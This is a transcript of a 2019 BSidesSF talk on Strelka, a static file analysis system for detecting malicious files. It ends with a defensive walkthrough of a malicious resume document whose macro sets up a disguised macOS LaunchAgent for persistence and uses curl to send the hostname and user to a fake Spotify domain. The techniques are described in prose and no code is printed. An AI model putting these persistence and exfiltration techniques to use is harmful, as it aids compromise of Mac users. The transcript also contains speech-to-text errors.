← All talks

Beyond AV: Detection-Oriented File Analysis

BSidesSF · 201928:25622 viewsPublished 2019-03Watch on YouTube ↗
Speakers
Tags
CategoryTechnical
StyleTalk
About this talk
This talk advocates adding detection-oriented file analysis systems to the modern threat detection technology stack by taking an in-depth look at Strelka, Target's recently released static file analysis system. Strelka's project lead will cover an overview of these systems, review Strelka's features and design, and show how data produced by these systems can be used to find malicious files in the enterprise.
Show transcript [en]

Josh please take it away Thanks good point it's good this could potentially replace some products you're gonna see at RSA this week so thanks everyone for coming to my talk and thanks to the organizers for inviting me to speak this talks focused on tools and techniques you can use to identify and detect malicious files in your enterprise the first third of the talk is going to be an overview of detection oriented file analysis while the last two thirds will be a bit more technical we'll end up walking through a real world example of detecting malicious attributes in a document file so before I jump into the the details I just wanted to quickly highlight my background I've been

working in threat detection for six years currently work at Target I'm a lead engineer in their cyber fusion center and you can find me all over the various social sites with my handle right there also I work from home so I wanted to give a shout out to my perennial co-workers of the year over here on the right so my talk today really is to try to convince you to consider adding detection oriented file analysis to your threat detection program because it resolves a data visibility gap that goes unaddressed by tools like antivirus and now our sandboxes and it's a data visibility gap that you definitely or probably have to start sometimes it's helped a little

look at a definition I consider this kind of file analysis to be any that enables real-time threat detection through enrichment extraction and metadata collection the goal of a system that does this kind of analysis is to collect enough data to allow defenders to either automatically or manually identify adversaries in their network so systems that do this have two defining traits to me first they generate a lot of file metadata from which you derive insight and second they are or should be relatively easy to integrate with the detection systems you currently have while also being customizable to your needs so definitions are nice but the the real question is you know what's in it for you if you decide to use a system

like this so the important thing to keep in mind about what I'm going to describe next is that these systems need to do all their tasks quickly and at scale in order to support real-time detection in a large enterprise so first the sis this kind of systems provide a pretty comprehensive level of detail across all kinds of files and that's important so defenders always have a consistent data set to work from this includes most commonly performing simple tasks like hashing every file with md5 or shot 256 next these systems commonly perform recursive file analysis that is they extract files from within other files and submit them to the analysis and analysis engine for processing you might normally think that

this only applies to something like archive files but it also equally applies to documents images even text files can contain other files and it's important that all those files are supported and finally there are just some files that you see in your enterprise that are more interesting than others and those always tend to get special treatment and these kinds of systems this would include something like targeting a specific type of metadata that's used to identify adversary activity for example doing verbose data collection of an executables import address table could be important to you that kind of idea having you know file specific metadata inspection applies to dozens and dozens of kinds of files so what's especially interesting to me

about this kind of analysis is that it's a really very underused in the active threat detection space there aren't a lot of organizations who are doing this despite it being highly valuable this is a release timeline of systems that people commonly reference when they talk about doing this kind of file analysis the main thing I want to point out about this list is that these systems share common design patterns but they have different intended purposes the three I've highlighted here are commonly used as detection and intelligence-gathering systems while some of the others are more focused on scan malware or automating mundane analyst tasks so in this presentation I'll be talking about strelka which is the

project that I open sourced under target last year but you know if any of what I say today piques your interests I'd suggest you take this list review the projects on it and see which ones may best fit your requirements and use cases so now we'll talk about Strelka if you're not familiar with her she's one of the one of the second-generation Soviet space dogs to achieve orbital flight and the project is named as such because it borrows the system architecture from Lockheed Martin's like a project so when it came time to name this project I wanted to pay homage to their work through the name the system can be simplest described as a recursive

static file analysis system that's built on Python and 0 mq one of the most significant changes we've made to this project compared to some of the other ones that were shown earlier is that we don't support Python - when it came time to start thinking about what the design of a new system like this would be I knew Python - couldn't be supported because it's a you know it's end of life is supposedly coming up very soon next year so out of the box strelka will produce event data for over 60 unique kinds of files and we place a pretty significant focus on files that are likely to be used for malicious purposes normally you might think of

documents and executables as files that are likely to be used maliciously but something like HTML could be just as malicious as an executable given the right context this project has a what I think are a number of unique features many of them are described in the github page for it some of my favorites that are real differentiators are the focus on scanning text-based files I mentioned HTML we also support xml visual basic code javascript batch script many more and the project is heavily focused on language neutral components so we use 0 mq for networking we use protobuf for the messaging format we use Yammer for the configuration files the project call or is written in Python but you know

technically you could write portions of it in nearly any language you want that is supported by those components so here we have a system architecture diagram of strelka the two important things they immediately call out here are the dotted lines running north to south those are Network hops so this is a distributed system and the second thing is the components in the center so those two components constitute a cluster now from a deployment point of view strokers primary goal is to integrate with whatever existing systems you have for detection as seamlessly as possible on the front end that means that clients tend to be things like network security monitoring sensors and that they just continuously push files to the cluster

on the back end the event data is written in Jason and you really can do whatever you want with it most users end up sending it to a centralized log aggregation system like Splunk or elastic you could also just stick it in an on pram or cloud database we don't limit what you can do with the data we just make it available to you what is a cool about that system architecture is that it makes it really easy to scale a cluster so the cluster I manage regularly scans up to 150 million files a day which is also approximately three terabytes of file content a day and the system will keep track of how long it

takes to scan each file so for the cluster I manage at the 95th percentile it takes 13 to 14 seconds to scan a file as soon as you go to the 85th percentile and lower you hit sub second scan times so the speed of an individual scan plus the distributed design really means you can scale to whatever volume of files you need to handle when I introduced this project to people for the first time there's always some questions that pop up right away and these are those questions I don't consider this to be an intrusion detection system I say that it enables intrusion detection you still need a human to decide what to do with

the data that gets produced that could be writing automated alerts from the data or manually crawling through the data something like threat hunting it's written in Python because Python has good third-party packaged sport for the kinds of files we care to scan and it really is just good enough the system architecture lets us bypass any inefficiencies it has through brute force scaling and when it comes to scalability we don't use micro services because they're way too difficult to manage and really are overkill for the vast majority of users we use cookie cutter scaling which means you build a cluster if it hasn't met the scale you need you just keep adding carbon copies of the same server to the cluster until

you either hit the scale you need or you run out of hardware so those are really the introductory details this is where we kind of get to the interesting part of this talk which is what you could actually find with this data and to do that what I'm gonna do is call on someone I follow on Twitter so this is John Lambert he works over at Microsoft and he shares a lot of interesting malware samples online many of which unsurprisingly include office documents what we're gonna do here is take one of the samples he shared late last summer walked through the Strelka data for that file and try to determine if we think it's malicious or not so what we'll be

looking at our three files in total the first files in office document it's a resume from Amanda and the second two files are files that are nested inside of that document and while we do this I just would like you to remember this stat that's over here on the on the Left 6 only 6 out of 59 AV engines flagged this document as suspicious which is a pretty low percentage lesson well approximately 10% so this is the literal JSON output of the strelka engine or system this is the this is file 1 of 3 that we'll be looking at this is the document itself before we really dig in here I think it's important to call out some of the

structure of the data the first is that at the root of the Jason event there's a variety of metadata dictionaries and they're all very literally named for the data that is encapsulated within them so hash metadata is the result of hashing funk zip metadata is artifacts related to zip extraction XF tool metadata is related to the output of the EXIF tool utility things like that these are very literally named so it's easy for an analyst to understand what the data represents the thing that is a little weirder and not literally named is this thing called flavors at the top so install Co we don't identify files by type we identify them by flavor and that's because sometimes it's useful to

identify a file by more than its type an example of that would be say you have an XML file that is simultaneously a malware configuration file those are both valid ways to identify that file and we use these flavors to assign scanners that produce the metadata you see here so it's important that we're flexible in how we name these things the two primary methods of tasting flavors in the system is through Lib magic in Yarra represented by the my manyara fields in the flavours dictionary so what we're actually gonna do here is we're gonna walk through this almost line by line and we'll talk to the interesting points here first if we didn't already know that this was an

office document the flavors are the thing that tell us that it is this happens to be a docx file this is that's what it would normally appear to be on an endpoint if you were looking at the file that's a that's a office open XML file the other interesting thing about the system is that we we hash every file no matter what so it always gets md5 sha-1 shop 256 etc we also assign a unique ID to the file because you need to be able to keep track of files that are directly related to one another so we tagged it with this unique ID if you keep an eye on the value of that UID

you'll see it pop up here again momentarily now this is where we actually kind of get into the interesting bits of detecting adversaries when we look at the EXIF tool metadata for this document the interesting so if you're not familiar with XF tool it's a fairly popular utility to parse generic metadata out of a variety of files hundreds of files documents image files archive files many kinds what is interesting about this set of metadata for this doc that is that there's nothing interesting about it you can see from the word-count that the document appears to have a reason about reasonable amount of words in it it's got a basically a word reasonable amount of content for a

resume creator value contains Amanda's name which matches the resume content you could actually go back and look at Jon's tweet to confirm that so what's interesting about this being uninteresting is that it isn't uncommon for adversaries to flub the values of this metadata you know for example they might do something like send you a resume that has five words in it which is weird or send you a resume that has a creator value that is just a random string and not someone's name those are interesting things that you could use as a detection breadcrumbs to figure out if you're dealing with something that might be malicious so that's really all there is to that this is going to kind of come

into play later what's interesting is that they the adversary in this case did a pretty good job of trying to you know obfuscate their their delivery of malware but it ends up being pretty futile in the end the last point here is that these files they have the structure of a zip so that means that when they are introduced to the system they get extracted as if they were a zip file so we just take all eighteen parts out of the file and parse those out and that's what we're going to be looking at here next is one of those eighteen files I believe this document has eighteen parts in all so this is the this is the

second file two of three and the thing to call out here is the existence of this dictionary called VBA metadata that's Visual Basic application metadata that's basically the thing in this metadata tells you this document might have macros in it macros being you know the thing that is intended to help end users by automating document related tasks but is typically used by adversaries to automate the installation of malware so if you look at the flavors there's really nothing too interesting here this is identified as an oily compound file what you actually don't need to know too much about it's just a kind of file that stores other files and in documents it commonly stores macros

once again we hash all the files we assign a unique ID to all the files in this case there's a new field that's called parent UID it could the value of the UID from the previous file so this is how we very explicitly relate files together it's important if you're looking at this kind of data to be able to pivot between files that are related and finally the VBA metadata actually doesn't say too much that's interesting except it confirms any suspicions we had that yes there was a macro code inside the document and we're going to be looking at the actual code of one of the macros here and the next slide the VBA scanner also tries to be

helpful and tell you about suspicious things in the VBA code like base64 encoded content we're going to look at that more depth here in the next file so this is the third file it's three of three this is the visual basic code from one of the macros this isn't like nested pretty deep within the document and what's interesting is that nearly everything that's detection worthy about this entire document all 30-plus parts is can be found in one field here which is the VB metadata strings so these are literally strings defined in the in the VB code as like variable definitions right like a equals blah that's the kind of string we're talking about here we're

gonna spend pretty much the rest of the presentation on that in particular because there's just so much to unpack there if you look at the the flavors yarra successfully identifies this as VB code let magic has no idea what VB code is so it just says it's plain text which is a correct though a little inaccurate I'll skip the hash metadata and UID once again you know we hashed everything all the time and this is how you relate files together but the VB strings is really where things kind of pop off here in this document the first thing that's interesting is this Python one-liner and as I'm going through this I want you to just recall like this is a resume from

Amanda why does it have a macro that contains you know a Python one-liner that is basic ste for decoding a very long string in this case the string was so long I had a truncated for space otherwise all of this would have been illegible there's also something else that's interesting here which is that they explicitly call a function to filter out and ignore any warnings thrown by the Python interpreter I'll kind of leave you to think about that for a minute we'll we'll come back to that at the end here why they may want to do that so that's weird that that exists at all on someone's resume but then it gets even weirder when you see this reference at

the end of the first highlighted line here to a watch agents directory and a Spotify browser API property list file so this is really your first indicator that you're looking at something that's targeting a Mac user and not a Windows user if you're not familiar with launch agents or property lists they're used to control system level processes on a Mac what's even more interesting is that not only do they reference the file they they actually have the actual structure of a property list file that follows it so you can see on the second line here there's the header of a plist file at the end of the third line there is a label that gets set that says Spotify

browser API which is clever so there they seem to seem to be from me from what I can tell I mean I'm not doing forensics here I'm just looking at metadata so we're making some guesses it appears what it's probably happening is that they are inserting the content into that file location right so they're either creating or over writing that Spotify browser API plist but it goes even further because they actually define you know this is all non encoded data this is just plain text in the VB code they go even further and they say they define what program is executed by the plist and what they have here is they have an array that says Python taxi

and then a blank string space and so we can't prove what is included what would Python is actually executing here right but a pretty good theory is that it's the one-liner we saw earlier in the video right they could assign that they could insert that into the plist via a variable definition which is very likely what's happening here and so if we're right what that means is it means that when the plist initializes and runs on the system it's actually executing whatever that Python blob is so we can actually go even further it really gets crazier the plist attributes that there are attributes that that really kind of clue you into adversarial intent and how they're

attempting to maintain control over the system here the run at load key means run the program when the system boots the start in and keep alive keys our methods of ensuring that the program is always running so these are methods of persistence for processes that are controlled by a property list file this guarantees that that that Python one-liner is always running the last thing here is this curl command and there's a lot to unpack just even in this one bit of the VB code but and this curl command they do some interesting things so the first thing they do is they override curls default user agent string and they set it to mimic a Mac

which is pretty clever so that's the that's the first indicator like if you don't know anything about launch agents or pee lists or how the Mac OS works that's your thing that tells you like this is certainly targeting a Mac user but they go in further and they they actually suppress the output of curl which is a fun callback to the technique they use in the Python one-liner to suppress warnings so python and curl have these utility like portions built into their code to to suppress output essentially right and that's an advantage for the adversary because it means when they execute and you're invite or code in your environment that you're less likely they see them the

only two things that are interesting about this are the domain that's used so a very attentive analyst or say a domain reputation service that is keyed into that domain would eventually be able to tell you that it is not a legitimate Spotify domain and then finally they're not downloading data from this domain they're uploading data to it so the tech D flag says that so once again we're not doing forensics we're just looking at metadata so I can't authoritative lis tell you what they're uploading but what's suspicious is that immediately after that there's a definition first or a variable assignment for a shell command substitution which contains the system's hostname and current user which if you think about it makes a lot of

sense because when an adversary gains access to your network what kinds of things do they need to know they need to know where they landed in the network which you could glean from a hostname and they need to know what level of access they have to the network which you could glean from you know the current user that is running on the system you've you've just popped now if you're if you're not familiar with mightor's attack matrix which it's actually been mentioned a lot during this conference so maybe you are now what I've done is I've mapped the techniques I just walked through to to the attack matrix the tactics on the right the techniques I just walked

through on the left and I think so one thing I want to stress about all these techniques I'm not going to read them because we just literally went through them but you know these individual individual II may not be detection worthy on their own but in aggregate they create what I think is a pretty compelling argument for a file analysis system like Strelka and its use in detecting adversaries so remember this document had a low antivirus detection rate malware sandboxes are not designed to collect this kind of data and make it easily available at large scale and in addition to all of that adversaries don't really expect you to have this level of insight into the files that are

moving in out and around your network because if they did this adversary probably wouldn't have left all that data uncoated unencoded so that's kind of where I'll wrap it up once again what I'd like to say about this is that if any of it Peaks your interests I'd be happy to chat with you about this project or point you in the direction of project owners for any of the other projects that were shared earlier I think if you're interested in maturing your threat detection program I'd recommend you take a look at this kind of file analysis because it opens up levels of insight that adversaries really don't expect you to have and that gives you a pretty big advantage when

they try to jump into your network I consider this kind of data to be fifth tentpole in the in the commonly thought of tentpoles of threatened tection being network data endpoint data cloud data authentication data I think file data like this could easily become a significant part of a threat detection program that's really where I'll leave it to any questions that came in online or or in the room we have a question from Ron you stated six out of fifty-nine AV engines marked the files as malicious which AV engines were those yeah that's an interesting question I actually happened to look that up right before this talk and it wasn't any engine you would you're probably running it's

it's stuff like Sentinel one not to call out vendors or anything like that I'm not recommending vendors here but it was it was vendors that are more geared toward behavioral analysis and not signature analysis none of your top five AV vendors detected this great work as someone who does file detection I had a couple of follow-up questions do you guys have this struck handle packed extraction of features from packed files or office kated file samples well so what's interesting about it I don't think I don't know that it does out of the box so we have support for we jump back here so so the these are the five main categories we support but it's all

just Python code so you could very easily write your own scanning code to handle whatever kind of file you like and then the way it works is you write a complimentary yarra signature to identify the file generically okay so this is plug-in friendly and you could add your own text overlay Cabos does absolutely yeah it's big it's designed to be very easy to add your own code to it and when you scan they use in the sample you scanned 18 levels of associated files what's the limit do you guys have you had a zip bomb or anything yeah okay boom like that yeah yeah there's there's yeah so there's a lot of nuance built into this that I really

don't have time to go through but yes zip bombs are our threat to systems like this so all of the all of the scanners that extract files they do have file limits the default limit is very high like a thousand files things like that in the case of a zip bomb you're more likely to run out of memory before you actually hit that file in it so yeah you do need to just you know do like a system like system hygiene system hardening to to protect yourself against files that might be actively trying to to mess with systems like this yeah thanks first thanks for the presentation awesome stuff a couple questions about what the project supports that's okay

yep so when you're doing VBA extraction are you relying on external libraries like oh le tools are you yeah something custom Oh le tools so so the so one thing I didn't really talk about is this project is all pretty much my work so we don't have a team supporting this it's just what I do and my equivalent of like 10% time so it's heavily reliant on third-party packages cool and this kind of bleeds into the previous question how difficult would it be to expand analysis like pipeline so if I wanted to treat the oo XML file is like a straight zip yeah look at timestamps within the file is that something yeah it's very easy I

mean as long as you have written code and Python before it's it's all very easy to do the readme is absurdly long and very detailed to help you with that cool and have you looked at RS IDs in RTF soro xml files not specifically cool thank you yep one last question do we have anyone yes we do in the far back way up near the top of Mount Everest

so I kind of tricked you it's actually statement not a question first of all thanks for your talk thanks for contribution and this is being recorded right your boss should totally give you a raise well then thank you Thank You Josh it's been a pleasure thanks thanks everyone